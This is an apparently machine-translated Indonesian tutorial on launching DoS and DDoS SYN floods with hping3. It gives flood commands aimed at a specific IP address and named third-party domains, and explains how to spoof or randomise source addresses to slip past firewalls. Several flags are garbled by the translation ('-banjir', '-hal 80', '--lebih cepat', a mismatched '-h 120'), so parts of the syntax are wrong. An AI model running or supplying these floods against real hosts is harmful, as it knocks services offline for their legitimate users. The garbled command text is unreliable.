Keamanan

hping3 banjir ddos

hping3 banjir ddos
Tutorial ini berfokus pada serangan DDOS (Distributed Denial of Service) menggunakan alat hping3. Jika Anda sudah terbiasa dengan serangan DOS (Denial of Service) dan DDOS, Anda dapat melanjutkan membaca dari petunjuk praktis hping3, jika tidak, disarankan untuk mempelajari cara kerja serangan ini.

Serangan DOS


Serangan penolakan Layanan (DOS) adalah teknik yang sangat sederhana untuk menolak aksesibilitas ke layanan (itulah sebabnya disebut serangan "denial of service"). Serangan ini terdiri dari membebani target dengan paket yang terlalu besar, atau dalam jumlah besar.

Meskipun serangan ini sangat mudah dilakukan, tidak membahayakan informasi atau privasi target, ini bukan serangan penetrasi dan hanya bertujuan untuk mencegah akses ke target.
Dengan mengirimkan sejumlah paket, target yang tidak dapat menangani penyerang mencegah server melayani pengguna yang sah.

Serangan DOS dilakukan dari satu perangkat, oleh karena itu mudah untuk menghentikannya dengan memblokir IP penyerang, namun penyerang dapat mengubah dan bahkan menipu (mengkloning) alamat IP target tetapi tidak sulit bagi firewall untuk menangani serangan tersebut , bertentangan dengan apa yang terjadi dengan serangan DDOS.

Serangan DDOS

Serangan Distributed Denial of Service (DDOS) mirip dengan serangan DOS tetapi dilakukan dari node yang berbeda (atau penyerang berbeda) secara bersamaan. Umumnya serangan DDOS dilakukan oleh botnet. Botnet adalah skrip atau program otomatis yang menginfeksi komputer untuk melakukan tugas otomatis (dalam hal ini serangan DDOS). Seorang peretas dapat membuat botnet dan menginfeksi banyak komputer dari mana botnet akan meluncurkan serangan DOS, faktanya banyak botnet yang menembak secara bersamaan mengubah serangan DOS menjadi serangan DDOS (itulah sebabnya disebut "didistribusikan").

Tentu saja, ada pengecualian di mana serangan DDOS dilakukan oleh penyerang manusia nyata, misalnya kelompok peretas Anonymous yang terintegrasi oleh ribuan orang di seluruh dunia sangat sering menggunakan teknik ini karena penerapannya yang mudah (hanya membutuhkan sukarelawan yang membagikan tujuan mereka), itu misalnya bagaimana Anonymous meninggalkan pemerintahan Libya Gaddafi benar-benar terputus selama invasi, negara Libya dibiarkan tak berdaya di hadapan ribuan penyerang dari seluruh dunia.

Jenis serangan ini, ketika dilakukan dari banyak node yang berbeda sangat sulit untuk dicegah dan dihentikan dan biasanya memerlukan perangkat keras khusus untuk menanganinya, ini karena firewall dan aplikasi pertahanan tidak siap untuk menangani ribuan penyerang secara bersamaan. Ini bukan kasus hping3, sebagian besar serangan yang dilakukan melalui alat ini akan diblokir oleh perangkat atau perangkat lunak defensif, namun berguna di jaringan lokal atau terhadap target yang kurang terlindungi.

Tentang hping3

Alat hping3 memungkinkan Anda mengirim paket yang dimanipulasi. Alat ini memungkinkan Anda untuk mengontrol ukuran, kuantitas, dan fragmentasi paket untuk membebani target dan melewati atau menyerang firewall. Hping3 dapat berguna untuk tujuan pengujian keamanan atau kemampuan, dengan menggunakannya Anda dapat menguji efektivitas firewall dan jika server dapat menangani sejumlah besar paket. Di bawah ini Anda akan menemukan petunjuk tentang cara menggunakan hping3 untuk tujuan pengujian keamanan.

Memulai serangan DDOS menggunakan hping3:

Pada distribusi Debian dan Linux berbasis Anda dapat menginstal hping3 dengan menjalankan:

# apt install hping3 -y

Serangan DOS (bukan DDOS) sederhana adalah:

# sudo hping3 -S --flood -V -p 80 170.155.9.185

Dimana:
sudo: memberikan hak istimewa yang diperlukan untuk menjalankan hping3.
hping3: panggilan program hping3.
-S: menentukan paket SYN.
-banjir: menembak pada kebijaksanaan, balasan akan diabaikan (itu sebabnya balasan tidak akan ditampilkan) dan paket akan dikirim secepat mungkin.
-V: Verbositas.
-hal 80: port 80, Anda dapat mengganti nomor ini untuk layanan yang ingin Anda serang.
170.155.9.185: IP sasaran.

Banjir menggunakan paket SYN terhadap port 80:

Contoh berikut menggambarkan serangan SYN terhadap lacampora.organisasi:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Dimana:
Lacampora.organisasi: adalah targetnya
-q: keluaran singkat
-n: tampilkan IP target alih-alih Host.
-h 120: atur ukuran paket
-rand-sumber: sembunyikan alamat IP.

Contoh berikut menunjukkan contoh kemungkinan banjir lainnya:

SYN membanjiri port 80:

# sudo hping3 --rand-source ivan.com -S -q -p 80 --flood

Dengan hping3 Anda juga dapat menyerang target Anda dengan IP palsu, untuk melewati firewall Anda bahkan dapat mengkloning IP target Anda sendiri, atau alamat yang diizinkan yang mungkin Anda ketahui (Anda dapat mencapainya misalnya dengan Nmap atau sniffer untuk mendengarkan mapan koneksi).

Sintaksnya akan menjadi:

# sudo hping3 -a -S -q -p 80 --lebih cepat -c2

Dalam contoh praktis ini, serangan akan tampak:

# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 --lebih cepat -c2

Saya harap Anda menemukan tutorial ini di hping3 bermanfaat. Ikuti terus LinuxHint untuk tips dan pembaruan lainnya tentang Linux dan jaringan.

permainan 5 Game Arkade Terbaik untuk Linux
5 Game Arkade Terbaik untuk Linux
Saat ini, komputer adalah mesin serius yang digunakan untuk bermain game. Jika Anda tidak bisa mendapatkan skor tinggi baru, Anda akan tahu apa yang s...
permainan Pertempuran Untuk Wesnoth 1.13.6 Pengembangan Dirilis
Pertempuran Untuk Wesnoth 1.13.6 Pengembangan Dirilis
Pertempuran Untuk Westnoth 1.13.6 dirilis bulan lalu, adalah rilis pengembangan keenam dalam 1.13.x series dan memberikan sejumlah peningkatan, teruta...
permainan Cara Menginstal League Of Legends di Ubuntu 14.04
Cara Menginstal League Of Legends di Ubuntu 14.04
Jika Anda adalah penggemar League of Legends, maka ini adalah kesempatan bagi Anda untuk menguji coba League of Legends. Perhatikan bahwa LOL didukung...